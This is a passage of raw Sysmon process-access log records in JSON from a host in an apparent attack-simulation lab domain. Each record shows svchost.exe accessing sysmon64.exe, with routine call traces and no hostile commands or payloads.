05:52:37.484","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4956,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.484\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.484","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4957,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.484\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.484","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4958,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.484\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.484","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4959,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.484\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.484","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4960,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.484\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.484","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4961,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.484\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.484","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4962,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.484\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.484","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4963,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.484\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 